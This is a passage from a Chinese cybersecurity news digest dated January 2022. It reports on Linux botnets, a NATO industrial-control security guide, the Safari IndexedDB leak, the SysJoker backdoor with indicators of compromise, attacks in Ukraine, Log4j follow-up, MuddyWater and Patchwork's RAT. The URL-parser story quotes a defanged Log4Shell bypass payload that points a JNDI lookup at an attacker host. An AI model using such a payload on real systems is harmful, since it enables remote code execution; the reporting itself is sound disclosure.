XorDDoS是一个为多种Linux架构编译的Linux木马,范围从ARM到x86和x64。它的名字来自于在恶意软件和网络通信中使用XOR加密到C2基础设施。当针对物联网设备时,该木马已知会使用SSH暴力攻击来获得对脆弱设备的远程控制。

在 Linux 机器上,XorDDoS 的一些变种显示,其操作者扫描和搜索Docker服务器,并打开2375端口。这个端口提供了一个未加密的Docker套接字和对主机的远程root无密码访问,攻击者可以滥用它来获得对机器的root访问。

● Mozi

Mozi 是一个点对点(P2P)僵尸网络,利用分布式哈希表(DHT)系统,实施自己的扩展DHT。DHT提供的分布式和去中心化的查找机制使Mozi能够将C2通信隐藏在大量合法的DHT流量后面。Mozi通过强加SSH和Telnet端口来感染系统。然后它封锁这些端口,以便不被其他恶意行为者或恶意软件覆盖。

● Mirai

Mirai 恶意软件在过去几年中声名鹊起,特别是在其开发者公布了 Mirai 的源代码之后。与Mozi类似,Mirai滥用弱协议和弱密码,如Telnet,利用暴力攻击入侵设备。

自从Mirai的源代码公开后,出现了多个Mirai变种,这个Linux木马可以被认为是当今许多Linux DDoS恶意软件的共同祖先。虽然大多数变种在现有的Mirai功能上进行了补充,或实现了不同的通信协议,但在其核心部分,它们共享相同的Mirai DNA。

【阅读原文】



3、北约能源安全卓越中心发布关键能源基础设施中保护工业自动化和控制系统免遭网络事件影响的指南

北约能源安全卓越中心 (NATO ENSEC COE) 1月11日发布了一份题为《GUIDE FOR PROTECTING INDUSTRIAL AUTOMATION AND CONTROL SYSTEMS AGAINST CYBER INCIDENTS》的指南,对关键能源基础设施(CEI)的安全性、可靠性、弹性和性能的基于技术的威胁(包括有意和无意的)进行了分析。 

图片


根据2011年至2021年对关键能源基础设施运营商的研究和实地考察,该指南就“基于模拟的运营商”决定对其控制系统进行现代化改造时如何实施数字化解决方案提供建议。该指南分析了监控关键能源基础设施物理过程的工业系统,发现它们并不统一,因为有些操作更加数字化,而有些操作则更老、更模拟甚至是手动控制。


指南首先明确了工业网络安全的目标和需求,是与IT网络安全的需求和目标不同的。在发生意外或恶意网络事故时,是否制定和实施网络安全政策,以提高管道作业的安全性、可用性、可靠性、完整性、性能和弹性,取决于在回答以下3个安全政策问题时所采取的谨慎程度:


  • 有哪些功能和资产需要保护?

  • 选定的资产和功能可能面临的威胁是什么?

  • 如何以最具成本效益的方式保护已识别的资产和职能免受已识别的威胁?



正确回答这些问题的一个主要挑战是,避免被Office IT偏见所主导的政策制定,这种偏见关注于保护网络上的数据或信息,而不是保护受物理和化学定律控制的物理过程。


指南还调查了出于犯罪动机的网络攻击,例如去年5月对美国东部一条主要燃料管道的勒索软件攻击,该攻击迫使运营商关闭了一条8000公里长的管道。该事件已在美国和其他国家/地区启动了对工业运营中使用 的控制系统架构的网络安全的审查。


指南中的建议适用于任何依赖工业自动化和控制系统 (IACS)来控制和监控物理过程的资产所有者。指南的撰写人,自动化专家Vytautas Butrimas写道:“我们需要采用全面的网络安全措施来保护我们的IACS,希望作为资产所有者,我们不会有一天醒来时听到我们的关键系统和运营受到威胁且无法信任的消息。” Butrimas 是 NATO ENSEC COE 的工业网络安全主题专家,国际自动化学会 (ISA) 99 MLM 第13工作组的联合主席,以及SCADA SEC列表的联合主持人。


Butrimas认为,工业系统的设计强调安全性和可靠性,很少考虑网络安全。虽然加强办公室/企业IT网络安全的工作在过去的二十年中已经发展到成熟的水平,但制定降低关键工业运营网络风险的措施才刚刚开始说。此外,这项任务变得困难,因为以IT数据为中心的网络安全措施往往会主导那些不完全适用于以保护物理过程为优先的工业环境的解决方案。


指南广泛涵盖了IACS操作员的注意事项以及初步的自我意识问题,同时分析了如何保护已识别的资产免受已识别的威胁。它还列出了网络安全程序工具箱中可用的工具,例如资产管理系统、标准、文档、评估和提高工业网络安全的成熟度、可编程逻辑控制器 (PLC) 的安全编码实践、修补和更新软件和固件,以及工业网络安全运营中心(ICOC)。


指南还研究了引入新挑战的工业4.0或工业物联网 (IIoT),因为它们将制造与业务功能相结合。添加了许多传感器来收集机器对机器活动的数据以进行数据分析。有人认为,这些分析数据的结果可用于提高效率、节省成本并保持竞争力。 


Butrimas称,这被认为是通过专注于在服务故障对客户产生负面影响之前检测它们来实现的,提供关键数据以支持管理层的决策,并推动预测分析和机器学习能力接近人工智能以支持运营。将所有这些活动连接在一起将是一个甚至包括无线通信的网络。 


他还指出,有些人质疑工业4.0支持者提出的所有好处背后的主张。例如,很难理解在工业企业中实施工业4.0技术的成本,以及传感器信任问题的处理能力如何。 


Butrimas认为,另一个将影响那些致力于提高关键能源和其他基础设施部门的能源安全和弹性的成功的重要因素是气候变化。 


Butrimas表示,随着物理影响的增加以及如何应对该问题的地缘政治紧张局势加剧,国家安全利益的风险可能会升级。为了制定有效的计划和成功实施解决方案,需要对解决气候变化目标的提案的成本效益进行新的研究。解决方案可能严重依赖应用于日益复杂和动态的系统的新技术和先进技术,这些技术与强大的附加功能一起,将带有可利用的漏洞。


指南的最后结论认为,威胁需要综合评估,根据所使用技术的知识(应用于一个项目时不能被认为“太技术性”),并参考安全威胁环境中发生的情况。动能作战和网络物理作战造成的损害评估不应被视为单独的威胁,而应视为可能同时出现的威胁。2008年俄格战争(russian - georgian War)中的侵略行动,以及2014年吞并乌克兰克里米亚省(Crimea province)的行动,以及随后在这场持续不断的战争中采取的行动,都是冲突的例子,它们几乎同时使用动能和网络行动来削弱和摧毁关键的基础设施。NATO需要采取全面的网络安全措施来保护IACS,希望类似2016年沙特石化工厂的经营者在意识到两次紧急关闭工厂并非意外之后所面临的情况不要再发生。

【阅读原文】



2022年1月18日 星期二

今日资讯速览:

1、苹果 Safari 浏览器漏洞允许跨站点用户跟踪


2、研究人员发现了一个可以解锁门和旋转栅门的漏洞


3、SATA SSD硬盘爆出安全漏洞 美光:攻击很难 会推更新



1、苹果 Safari 浏览器漏洞允许跨站点用户跟踪


Hackernews 编译,转载请注明出处:

在苹果 Safari 15的 IndexedDB API 实现中放入的一个软件漏洞可能被恶意网站利用,以追踪用户在网络浏览器中的在线活动,更糟糕的是,它还可能泄露用户的身份。


2021年11月28日,防欺诈保护软件公司 FingerprintJS 向 iPhone 制造商报告了这一漏洞。


IndexedDB 是 web 浏览器提供的一个低级 JavaScript 应用程序编程接口(API) ,用于管理结构化数据对象(如文件和 blob)的 NoSQL 数据库。


“像大多数 web 存储解决方案一样,IndexedDB 遵循同源策略,”Mozilla 在其 API 文档中指出。”因此,尽管您可以访问域内存储的数据,但不能访问跨不同域的数据。”


同源是一种基本的安全机制,它确保从不同的来源(即方案(协议)、主机(域)和 URL 的端口号等)检索到的资源彼此隔离。这实际上意味着“ http [ : ]/example [ . ]Com/”和“ https [ : ]//example [ . ]Com/”并不是同一个来源,因为它们使用不同的方案。


通过限制从一个来源加载的脚本与另一个来源的资源进行交互的方式,用于隔离潜在的恶意脚本,通过预防流氓网站运行任意的 JavaScript 代码来读取来自另一个域的数据(比如电子邮件服务),来减少潜在的攻击载体。


但是 Safari 在 iOS、 iPadOS 和 macOS 中处理 IndexedDB API 的情况并非如此。


“在 macOS 上的 Safari 15,以及 iOS 和 iPadOS 15上的所有浏览器中,IndexedDB API 都违反了同源政策,”Martin Bajanik 在一份报告中写道。每当网站与数据库交互时,在同一浏览器会话中的所有其他活动框架、标签和窗口中都会创建一个具有相同名称的新(空)数据库


这种侵犯隐私的后果是,它允许网站知晓了用户在不同的选项卡或窗口中访问的其他网站,更不用说准确识别像 YouTube 和 Google Calendar 这样的谷歌服务上的用户,因为这些网站创建了 IndexedDB 数据库,其中包括经过验证的谷歌用户 id,这是一个识别单个谷歌账户的内部标识符。


“这不仅意味着不受信任或恶意的网站可以知道用户的身份,而且还可以知道同一用户使用的多个独立账户,”Bajanik 说。

更糟糕的是,如果用户在浏览器窗口的同一个标签内访问多个不同的网站,这种泄漏还会影响 Safari 15的隐私浏览模式。我们已经联系了苹果公司,希望得到进一步的评论,如果得到回复,我们将更新相关报道。


“这是一个巨大的漏洞,”谷歌 Chrome 开发者杰克 · 阿奇博尔德在推特上写道。”在 OSX 上,Safari 用户可以(暂时)切换到另一个浏览器,以避免其数据跨源泄漏。iOS 用户没有这样的选择,因为苹果(Apple)禁止其它浏览器引擎。”

【阅读原文】



2、研究人员发现了一个可以解锁门和旋转栅门的漏洞


Positive Technologies 的研究人员发现了 IDEMIA 生物特征识别设备中的一个严重漏洞。通过利用该漏洞,攻击者可以解锁门和旋转门。


IDEMIA 生物特征识别设备用于世界上最大的金融机构、大学、医疗机构和关键基础设施。Natalya Tlyapova、Sergey Fedonin、Vladimir Kononovich 和 Vyacheslav Moskvin 在这些设备中发现了一个严重漏洞 (VU-2021-004)。通过利用它,威胁参与者可以解锁门和旋转栅门。


Positive Technologies ICS 安全负责人 Vladimir Nazarov 解释说:“IDEMIA ACS 的几行生物识别阅读器已发现该漏洞,该阅读器配备指纹扫描仪和分析指纹和静脉图案的组合设备。”


“攻击者可能会利用该漏洞进入保护区或禁用访问控制系统,” 他补充说。


受此漏洞影响的设备列表:


· MorphoWave Compact MD


· MorphoWave Compact MDPI


· MorphoWave Compact MDPI-M


·VisionPass MD


· VisionPass MDPI


· VisionPass MDPI-M


・SIGMA Lite(所有版本)


・SIGMA Lite+(所有版本)


・SIGMA Wide(所有版本)


・适马极限


· MA VP MD


要消除此漏洞,请根据 IDEMIA 安全安装指南的第 7 节启用并正确配置 TLS 协议。在未来的固件版本中,IDEMIA 将默认强制激活 TLS。


————————————————

原文作者:全球网络安全资讯

转自链接:https://www.wangan.com/p/7fy7fg27d4305625

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



3、SATA SSD硬盘爆出安全漏洞 美光:攻击很难 会推更新


日前美光针对数据中心市场的5200、5200系列SATA SSD硬盘被发现存在安全漏洞,随后美光方面证实了这个问题,表示利用这个漏洞发起攻击很难,但他们还是会推出固件更新帮助用户解决问题。


美光发表最新声明称,美光非常重视数据安全,并对此做了深入调查,确实发现了一个相关的潜在漏洞,理论上可能存在于两条产品线,即美光5200和 5300数据中心SATA SSD 中。


美光表示,为了利用这个潜在的漏洞,攻击者必须拥有特权授权才能向驱动器发出特殊命令,因此它不太可能暴露给虚拟化云基础设施或企业数据中心中的用户。


尽管如此,美光仍将发布可选固件更新,为任何担心受影响产品的此问题的客户解决此潜在漏洞。


此前报道,IEEE Xplore 发表的一篇题为“ Forensic Issues and Techniques to Improvement Security in SSD With Flex Capacity Feature ”的论文提出了有关使用ATA标准集max的行业设备中可变过度配置能力的安全问题地址命令,包括美光5200 SSD。

【阅读原文】



2022年1月17日 星期一

今日资讯速览:

1、新的跨平台"SysJoker"后门同时影响macOS、Windows、Linux


2、微软警告称乌克兰计算机网络遭到具有潜在破坏性的网络攻击


3、白宫开源安全会议后 Google和IBM开始征集关键项目名单



1、新的跨平台"SysJoker"后门同时影响macOS、Windows、Linux


据报道,新的"SysJoker"后门可以攻击多个操作系统,包括macOS、Windows和Linux。来自Intezer的研究人员透露,他们发现了SysJoker,这个后门最初被发现是攻击Linux的。不久之后,同一后门的变种被发现,它们可以扩展出对Windows和macOS进行攻击。

Untitled-22.png

这一发现是不寻常的,因为发现可以同时攻击多个平台的恶意代码是很罕见的。通常情况下,恶意软件只为攻击一个平台的特定漏洞而生成,而不是以类似的方式同时为多个平台开发。根据研究人员的技术分析,SysJoker被认为是在2021年下半年的一次攻击中启动的。安全研究员Patrick Wardle对其macOS变种进行了分析。该代码被发现是一个涵盖英特尔和arm64构建的通用二进制文件,这意味着它可以在Apple Silicon以及带有英特尔芯片的旧Mac上运行。该代码有签名,尽管是临时性的签名。


最初运行时,该软件将自己复制到用户的库中,作为macOS的更新,用于在受感染的系统上持续存在。


运行后,该恶意软件随后试图下载一个文件,形成一个Google Drice账户,并能够下载和运行一个可执行文件,这取决于来自指定控制服务器的命令。其他命令包括解压缩下载的可执行文件,以及改变解压缩的可执行文件的权限以允许其运行。


而Windows下的分析表明,它的操作方式实际上是一样的,即假装是一个更新,联系远程服务器下载一个载荷并接收其他命令,并在目标系统上执行代码。在被研究人员发现后,该后门开始被反病毒引擎标记出来。


至于它的目的,Intezer还没有看到攻击者发送的第二阶段或命令,这表明它有一个非常具体的目的,因此很可能是来自一个"高级行为者"。人们认为其目的是"间谍活动",尽管有可能作为后续阶段进行勒索软件攻击。


如何检测SysJoker

Intezer公布了一份系统被攻击的指标清单,包括创建哪些文件和允许代码持续存在的LaunchAgent。

SysJoker创建的文件和目录包括。

/Library/MacOsServices

/Library/MacOsServices/updateMacOs

/Library/SystemNetwork

/Library/LaunchAgents/com.apple.update.plist

持久性代码在LibraryLaunchAgents/com.apple.update.plist这个路径下。如果在Mac上发现这些文件,建议关闭所有相关进程并删除这些文件。

目前还不清楚用户如何成为SysJoker的受害者。

【阅读原文】



2、微软警告称乌克兰计算机网络遭到具有潜在破坏性的网络攻击


微软周六晚间警告说,它在乌克兰的几十个政府和私人计算机网络中检测到一种极具破坏性的恶意软件,似乎在等待着一种未知行为的触发。该公司在一篇博文中说,周四,大约在乌克兰政府机构发现其网站被破坏的同一时间,监视微软全球网络的调查人员发现了该代码。微软说:"这些系统横跨多个政府、非营利组织和信息技术组织,都在乌克兰。"


访问微软文档了解更多攻击细节:

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

h1sv.jpg

这段代码似乎是在俄罗斯外交官与美国和北约就俄罗斯军队在乌克兰边境集结举行了三天会议之后,宣布谈判基本上陷入了死胡同时部署的。


乌克兰官员将其政府网站的污损归咎于白俄罗斯的一个团体,尽管他们说他们怀疑俄罗斯参与其中。但是,早期的攻击归因经常是错误的,而且目前还不清楚污损是否与微软所说的检测到的更具破坏性的代码有关。


微软表示,它还不能确定入侵背后的团体,但它似乎不是其调查人员以前见过的攻击者。根据该公司调查人员的描述,这段代码看起来像勒索软件--它冻结了所有的计算机功能和数据,并要求以付款作为回报。但没有接受金钱的基础设施,导致调查人员得出结论,其目的是造成最大的损害,而不是获取现金。


有可能的是,这种破坏性的软件并没有传播得太广,微软的披露将使这种攻击更难转移。但也有可能,攻击者现在会推出恶意软件,并试图尽可能多地破坏计算机和网络。乌克兰方面表示,对于俄罗斯黑客而言,乌克兰经常是网络武器的试验场。


在2014年的一次总统选举中,乌克兰中央选举委员会遭到攻击,这次攻击被认为是俄罗斯方面试图改变选举结果,但没有成功。美国政府方面后来发现,这种攻击还渗透到了美国民主党全国委员会的服务器。2015年,对乌克兰电网的两次重大攻击中的第一次,使该国不同地区的灯光关闭数小时,包括首都基辅。


而在2017年,乌克兰的企业和政府机构受到了名为NotPetya的破坏性软件的攻击,该软件利用了在该国广泛使用的一种报税软件的漏洞。这次攻击关闭了乌克兰的主要经济活动,并打击了联邦快递和马士基航运公司;美国情报官员后来追踪到它是俄罗斯人所为,且那一次攻击方式至少在其整体设计上与微软周六警告的有一些相似之处。新的攻击会将硬盘擦除并彻底摧毁文件。一些国防专家说,这种攻击可能是俄罗斯地面入侵的前奏。

【阅读原文】



3、白宫开源安全会议后 Google和IBM开始征集关键项目名单


Google和IBM在参加白宫关于开源安全问题的会议后,敦促科技组织联合起来,确定关键的开源项目。这次会议由白宫网络安全领导人Anne Neuberger领导,与会者包括Apache、Google、苹果、亚马逊、IBM、微软、Meta、Linux和Oracle等组织的官员,以及国防部和网络安全与基础设施安全局(CISA)等政府机构。

这次会议是在各组织继续解决Log4j漏洞的情况下召开的,该漏洞自12月被发现以来一直引起关注。


Google和Alphabet的全球事务总裁肯特-沃克说,鉴于数字基础设施对世界的重要性,现在是时候开始用我们对待物理基础设施的方式来考虑它了。


沃克说:"开源软件是大部分网络世界的连接组织--它应该得到我们对道路和桥梁的同样关注和资助。"在一篇博文中,沃克解释说,在会议期间,Google就如何在Log4j漏洞发生后继续前进提出了几个建议。沃克说,需要建立一个公私合作关系,以确定关键开源项目的清单,而关键性应根据项目的影响力和重要性来确定。该清单将帮助企业确定优先次序,并为最基本的安全评估和改进分配资源。


IBM的企业安全执行官杰米-托马斯赞同沃克的意见,并表示白宫会议"明确了政府和行业可以共同改善开源的安全实践"。


托马斯说:"我们可以从鼓励广泛采用开放和合理的安全标准开始,确定应该满足最严格的安全要求的关键开源资产,并促进国家合作,扩大开源安全的技能培训和教育,奖励在该领域取得重要进展的开发者。"沃克介绍了像OpenSSF这样的组织的工作,此前Google向其投资了1亿美元,这些组织已经在寻求建立这样的标准。


他还说,Google提议成立一个组织,作为开源维护的市场,将企业的志愿者与最需要支持的关键项目相匹配。他指出,Google已经"准备好为此举贡献资源"。

博文指出,目前没有官方的资源分配,也没有什么正式的要求或标准来维护关键开源代码的安全。大多数维护和加强开放源代码安全的工作,包括修复已知的漏洞,"都是在临时的、自愿的基础上完成的"。


"长期以来,软件界一直对这样的假设感到欣慰,即由于开源软件的透明度和'许多眼睛'都在注视着发现和解决问题,所以开源软件一般是安全的。但事实上,虽然有些项目确实有很多眼睛在盯着它们,但其他项目却很少或根本没有,"沃克说。


阿帕奇软件基金会的营销副总裁Joe Brockmeier在一份声明中说,要解决开源供应链固有的安全问题,将需要消费和运送开源软件的公司和组织进行上游合作。

科技巨头Akamai也有代表参加了白宫会议,它支持Google和IBM建议的许多措施,并补充说,政府和技术界需要在发现漏洞时建立可靠的遏制计划,在首次发现漏洞时改善跨政府和行业的信息共享,并扩大政府对解决方案的授权以增加防御能力。


Akamai首席安全官Boaz Gelbord表示,次会议的一个重要收获是,大家都认识到需要做更多的工作来支持开源社区在不断变化的威胁环境中成长。


"作为开源和开放标准的突出支持者,Akamai认为特别需要加强信息共享、强大的漏洞管理和建立遏制计划,以控制攻击的爆炸半径,"Gelbord说。"我们期待着扩大我们在开源社区的努力,并为这次白宫会议提出的重要的下一步措施做出贡献"。

【阅读原文】



2022年1月14日 星期五

今日资讯速览:

1、白宫邀请苹果、亚马逊、IBM讨论开源软件安全问题


2、年轻黑客宣称远程控制了 25 辆特斯拉:并非通过软件漏洞操作


3、美国网络司令部将黑客组织MuddyWater与伊朗情报部门联系起来



1、白宫邀请苹果、亚马逊、IBM讨论开源软件安全问题


在美国遭受多次利用开源软件漏洞的攻击后,包括苹果在内的科技公司高管将于周四参加白宫的网络安全会议。1月13日星期四的会议是由于发现了开源Log4j软件的漏洞而专门召开的,该软件在国际上被用于应用程序的数据记录。


白宫国家安全顾问杰克-沙利文在12月写信给大科技公司的首席执行官,说这种开源软件是一个"关键的国家安全问题"。


据路透社周四上午的报道,与副国家安全顾问安妮-诺伊贝尔格的会议将讨论如何提高开源软件的安全性。除了苹果、亚马逊和IBM,预计还将包括微软、Meta、甲骨文以及国防部等机构的高管。


这次讨论也是在包括2021年SolarWinds黑客事件之后进行的,该事件访问了政府的电子邮件和电话。它也是在2020年美国财政部被入侵后发生的。


目前还不清楚谁将作为公司的代表参加会议,基于防疫因素,这次会议预计也是线上举办的。

【阅读原文】



2、年轻黑客宣称远程控制了 25 辆特斯拉:并非通过软件漏洞操作


IT之家 1 月 13 日消息,根据外媒 techspot 报道,一名 19 岁的海外黑客 David Columbo 本周在 Twitter 发帖宣布,能够在车主不知情的前提下远程控制来自 13 个国家的 25 辆特斯拉电动汽车。


David Columbo 尽管十分年轻,但已经是一名 IT 安全专家。他表示,已经将漏洞报告给非营利性组织 Mitre,但是不想公开是如何做到了。

推特截图

Columbo 表示,他可以获得每辆车的精确定位,禁用安全措施;不论车辆是否正在行驶,都可以开关车窗,此外还能够以最大音量播放音乐、YouTube 视频。尽管他不能操控这些车的驾驶过程,但是可以远程解锁车辆,亲自前往车辆所在地,可以偷走这台车。


据IT之家了解,特斯拉的安全团队表示正在调查此事。但是 Columbo 表示,实现远程控制操作并非利用特斯拉软件的漏洞,而是因为这些车主自己的错误造成的。

【阅读原文】



3、美国网络司令部将黑客组织MuddyWater与伊朗情报部门联系起来


据《The Record》报道,美国网络司令部周三透露,一个以网络间谍活动闻名的黑客组织实际上是伊朗情报机构的一部分。美国网络司令部下属的国家网络任务部队宣布,这个被称为“MuddyWater”的组织是伊朗情报和安全部的一个下属单位。


这一说法标志着美国政府首次公开将这一多产的威胁行为者--其目标从学术界和旅游业到政府和电信运营商--与伊朗情报机构联系起来。


“美国网络司令部已经介入。”SentinelOne公司的首席威胁研究员J.A. Guerrero-Saade在Twitter上提到伊朗的伊斯兰革命卫队时说:“MuddyWater归属于伊朗的MOIS(而不是一些人认为的IRGC)。”

美国网络司令部与美国联邦调查局合作,还将全球各地雇用伊朗情报人员的多个开源恶意软件工具上传到流行的恶意软件库VirusTotal。


“如果你看到这些工具的组合,伊朗MOIS行为者MuddyWater可能在你的网络中,”美国网络司令部在这十个条目的顶部警告说。


“我们坚持不懈地发布恶意软件,以使我们整个国家的防御。公开披露恶意的网络活动或行为者,使美国的利益和我们的合作伙伴得到保护。#CyberIsATeamSport,”美国网络司令部的官方Twitter账户发推文说。

在一份声明中,美国网络司令部的发言人拒绝透露该组织是如何发现这些恶意工具的,或者这些样本是否是由第三方提供的。


“我们不讨论CNMF团队发布的恶意软件样本的来源。这些恶意软件样本中的一些是已经在公共领域的其他恶意软件的变种--这次披露的独特之处在于,它提供了伊朗恶意网络行为者可能通过使用恶意软件收集信息的整体情况。”


据悉,MuddyWater,有时被称为SeedWorm,至少从2015年开始就进行了间谍活动。


上个月,赛门铁克的威胁猎手团队发布研究报告,发现该组织在过去6个月中针对整个中东和亚洲的电信运营商和IT服务组织。


研究人员的结论是,所涉及的目标和战术--攻击者依靠公开的恶意软件和远程管理及安全评估工具来窃取凭证,在整个网络中移动--“与伊朗赞助的行为者一致”,但没有将该活动归于伊朗政府。


在美国网络司令部强调的恶意软件样本中,有一些PowGoop的变种,这是一种虚假的Google更新机制。其中包括一个赋予攻击者指挥和控制功能的变体,以及另外两个作为信标的变体,从被攻击的网络中联系恶意的基础设施。其他样本包括恶意的JavaScript文件和一个版本的Mori后门。

【阅读原文】



2022年1月13日 星期四

今日资讯速览:

1、黑客组织Patchwork感染自己开发的恶意程序 导致内部系统被曝光


2、CISA主管:Log4j漏洞影响巨大 安全业面临一场持久战


3、19岁少年远程入侵25辆特斯拉汽车 称利用软件漏洞



1、黑客组织Patchwork感染自己开发的恶意程序 导致内部系统被曝光


印度相关的黑客组织 Patchwork 自 2015 年 12 月以来一直很活跃,主要通过鱼叉式网络钓鱼攻击针对巴基斯坦。在 2021 年 11 月底至 12 月初的最新活动中,Patchwork 利用恶意 RTF 文件投放了 BADNEWS(Ragnatela)远程管理木马(RAT)的一个变种。但有趣的是这次活动却误伤了他们自己,使得安全研究人员得以一窥它的基础架构。

本次活动首次将目标锁定在研究重点为分子医学和生物科学的几位教员身上。令人讽刺的是,攻击者利用自己的 RAT 感染了自己的电脑,从而让安全公司 Malwarebytes 收集到了他们电脑和虚拟机的按键和屏幕截图。


通过分析,Malwarebytes 认为本次活动是 BADNEWS RAT 的一个新的变种,叫做 Ragnatela,通过鱼叉式网络钓鱼邮件传播给巴基斯坦的相关目标。Ragnatela 在意大利语中意为蜘蛛网,也是 Patchwork APT 使用的项目名称和面板。

在本次活动,当用户点击这些恶意 RTF 文档之后,就可以利用 Microsoft Equation Editor 中的漏洞植入 RAT 程序,它会以 OLE 对象存储在 RTF 文件中。在设备感染之后,它会和外部的 C&C 服务器建立连接,具备执行远程命令、截取屏幕、记录按键、收集设备上所有档案清单、在特定时间里执行指定程序、上传或者下载恶意程序等等。


Ragnatela RAT 是在 11 月下旬开发的,如其程序数据库 (PDB) 路径 “E:\new_ops\jlitest __change_ops -29no – Copy\Release\jlitest.pdb” 所示,并被用于网络间谍活动。


Ragnatela RAT 允许威胁参与者执行恶意操作,例如:

● 通过 cmd 执行命令

● 屏幕截图

● 记录键盘按键

● 收集受害者机器中所有文件的列表

● 在特定时间段收集受害者机器中正在运行的应用程序列表

● 下载附加有效载荷

● 上传文件

为了向受害者分发RAT,Patchwork用冒充巴基斯坦当局的文件引诱他们。例如,一个名为 EOIForm.rtf 的文件被威胁者上传到他们自己的服务器 karachidha[.]org/docs/。该文件包含一个漏洞(Microsoft Equation Editor),其目的是破坏受害者的计算机并执行最终的有效载荷(RAT)。

不过,Malwarebytes 发现 Patchwork 自己也感染了 Ragnatela。通过 RAT,研究人员发现了该组织开发的基础框架,包括跑Virtual Box、VMware作为Web开发及测试环境,其主机有英文及印度文双键盘配置、以及尚未更新Java程式等。此外他们使用VPN Secure及CyberGhost来隐藏其IP位址,并透过VPN登入以RAT窃得的受害者电子邮件及其他帐号。

【阅读原文】



2、CISA主管:Log4j漏洞影响巨大 安全业面临一场持久战


美国网络安全与基础设施安全局(CISA)高级官员周一表示,安全专业人员将在很长一段时间内,与严重的 Log4j 安全漏洞作斗争。如果未打补丁或无视修复,一个月前在 Apache Log4j 中曝光的 Java 日志库安全漏洞,将给互联网带来巨大的风险。网络攻击者可利用广泛使用的软件中的漏洞,接管受害计算机和服务器,进而使消费电子产品和政企系统全面沦陷。

(截图 via NIST)


在周一的电话会议期间,CISA 主任 Jen Easterly 向记者透露:尽管还有许多攻击未见诸报端,但目前尚未有任何美国联邦机构受到 Log4j 漏洞、以及重大网络攻击的损害。

该漏洞波及数以千万计的互联网联网设备,影响范围之广,使之成为 CISA 史上最糟糕的一次经历。

此外攻击者可能正在等待一个大家都感到懈怠的时机,从而让 Log4Shell 能够在未来更好地用于入侵。

(截图 via CISA)


Jen Easterly 还援引了 2017 年发生的 Equifax 数据泄露事件,其同样归咎于开源软件中的一个漏洞,最终导致近 1.5 亿美国人的个人信息泄露。


截至目前,大多数漏洞利用仍集中在较低级的加密货币挖矿、或尝试将受害设备拖入僵尸网络。最先曝出的,就是微软旗下的《我的世界》游戏服务器。

与此同时,世界各地也发生了类似的大规模攻击。比如上月,比利时国防部就证实,其系统也因 Log4j 安全漏洞而遭到了破坏。

【阅读原文】



3、19岁少年远程入侵25辆特斯拉汽车 称利用软件漏洞


据报道,19岁的德国安全研究人员大卫·科伦坡(David Colombo)日前表示,他在特斯拉的系统中发现一处软件漏洞,并通过该漏洞远程入侵了13个国家的逾25辆特斯拉电动汽车,使其关闭安全系统。


科伦坡自称为“信息技术专家”,当地时间周二在Twitter上称,特斯拉汽车的该软件漏洞允许他远程打开门窗,无需钥匙就能启动汽车,还能关闭车辆的安全系统。



科伦坡还称可以看到车内是否有司机,打开车辆的音响系统,并让车头大灯闪烁。


科伦坡说:“想象一下,如果你行驶在高速公路上,有人远程打开音乐播放功能(以最大的音量),或者打开车窗和车门,那是相当危险的。即使是不停地闪烁车头大灯,也可能对其他司机产生一些危险的影响。”


他表示无法远程干扰特斯拉车主的操作,也无法远程驾驶汽车。


科伦坡并未透露该软件漏洞的详细细节,但表示该漏洞不在特斯拉的软件或基础设施内。另外,科伦坡还表示,全球只有一小部分特斯拉车主受到影响。


有媒体在Twitter上向科伦坡寻求置评,但尚未得到回复。特斯拉也没有立即回复记者的置评请求。


据悉,特斯拉有一个漏洞披露平台,安全研究人员可以在这个平台上注册自己的车辆进行测试,特斯拉可以预先批准。此前,特斯拉曾为一处漏洞支付了15000美元的费用。


科伦坡还表示,他一直在与特斯拉的安全团队保持联系,特斯拉目前正在调查该问题,如果有最新进展也会告知科伦坡。

【阅读原文】



2022年1月12日 星期三

今日资讯速览:

1、研究人员在十几个广泛使用的 URL 解析器库中发现了 bug


2、IRISA开发新型恶意软件检测系统 通过树莓派探测特定电磁波


3、Check Point安全报告显示去年企业受到的总体网络攻击量有明显增加



1、研究人员在十几个广泛使用的 URL 解析器库中发现了 bug


Hackernews 编译,转载请注明出处:

研究员在对16种不同的URL解析库进行研究时发现了不一致和混淆,这可能被用来绕过验证,并且易受到黑客的攻击。


在一项由网络安全公司 Claroty 和 Synk 联合进行的深入分析中,他们在许多第三方库中发现八个安全漏洞,这些漏洞是用 C、 JavaScript、 PHP、 Python 和 Ruby 语言编写的,并被多个 web 应用程序使用。


研究人员在与 The Hacker News 共享的一份报告中表示: “ URL 解析中的混乱可能会导致软件中出现意想不到的情况(比如 web 应用程序) ,并可能被攻击者利用来导致拒绝服务情况、信息泄露,或者可能造成远程代码执行攻击。”


由于 URL 是一种基本机制,可以请求和检索位于本地或网络上的资源,解析库阐释 URL 请求的差异可能会给用户带来重大风险。


一个典型的例子是上个月在无处不在的 Log4j 日志框架中披露的 Log4Shell 漏洞,这个缺陷的原理是这样的,即当一个易受攻击的应用程序对一个恶意攻击者控制的字符串进行日志记录时,该字符串会导致一个 JNDI 查找,该字符串连接到一个攻击者操作的服务器,并执行任意的 Java 代码。


尽管美国 Apache软件基金会安全局(ASF)很快提出了一个修复方案来解决这个问题,但是很快就发现通过”${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” 格式的特制输入可以绕过这个方案,再次允许远程 JNDI 查找实现代码执行。


“这种绕过原理是这样的,即两个不同的(!)URL 解析器在 JNDI 查找过程中被使用了 ,一个解析器用于验证 URL,另一个解析器用于获取 URL,并且根据每个解析器如何处理 URL 的片段部分(#) ,权限也会发生变化,”研究人员说。

具体来说,如果输入被视为一个常规的 HTTP URL,Authority 组件(域名和端口号的组合)将在遇到片段标识符时结束,而如果将其视为一个 LDAP URL,解析器将分配整个”127.0.0[.]1#.evilhost.com:1389″作为权限,因为 LDP URL 规范没有说明片段。


实际上,能够发现这八个漏洞有两个主要原因,使用多个解析器是其一,另一个原因是当库遵循不同的 URL 规范时出现不一致问题时,实际上引入了一个可利用的漏洞。


混淆中不协调的URL包含反斜杠(“\”),不规则的斜杠数量(例如, https:///www.example[.]com)或者 URL 编码数据(“%”),有的URL缺少 URL 方案,这可能被用来获得远程代码执行,甚至出现拒绝服务(DoS)和开放重定向钓鱼攻击。


发现的8个漏洞列表如下,所有这些漏洞都已经由各自的维护者解决了

  • Belledonne’s SIP Stack (C, CVE-2021-33056)
